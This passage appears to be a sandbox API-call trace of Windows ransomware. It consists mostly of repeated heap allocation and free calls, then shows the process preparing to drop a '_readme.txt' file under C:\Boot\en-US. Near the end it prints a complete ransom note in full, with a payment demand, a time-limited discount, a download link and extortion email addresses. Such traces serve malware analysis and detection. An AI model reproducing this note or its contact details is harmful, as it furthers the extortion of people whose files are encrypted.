hHeap=0x6a0000) returned 1 [0178.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.732] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.732] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.732] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.732] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.732] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.733] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.733] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.733] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.733] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.734] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.734] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.734] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.734] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.734] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.734] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.734] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.734] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.734] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.735] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.735] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.735] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0178.735] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.735] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.735] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.735] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.735] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.736] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.736] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.736] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.736] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.736] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0178.736] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.736] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.737] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.737] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.737] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.737] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.737] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.737] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.737] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.737] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0178.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0178.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0178.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0178.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.747] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.747] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.747] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.747] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.748] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.748] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.748] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.748] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.748] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0178.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.753] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.753] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0178.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0178.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0178.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0178.765] PathFindFileNameW (pszPath="C:\\Boot\\en-US\\") returned="en-US\\" [0178.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.766] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0178.766] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0178.766] PathFindFileNameW (pszPath="") returned="" [0178.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.766] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0178.766] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0178.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x800) returned 0x2d2ec90 [0178.766] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0178.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2d154b0 [0178.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.766] FreeLibrary (hLibModule=0x759d0000) returned 1 [0178.766] PathAppendW (in: pszPath="C:\\Boot\\en-US\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\en-US\\_readme.txt") returned 1 [0178.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.767] PathFileExistsW (pszPath="C:\\Boot\\en-US\\_readme.txt") returned 0 [0178.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d32670 [0178.767] lstrcpyW (in: lpString1=0x2d32670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0178.767] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not 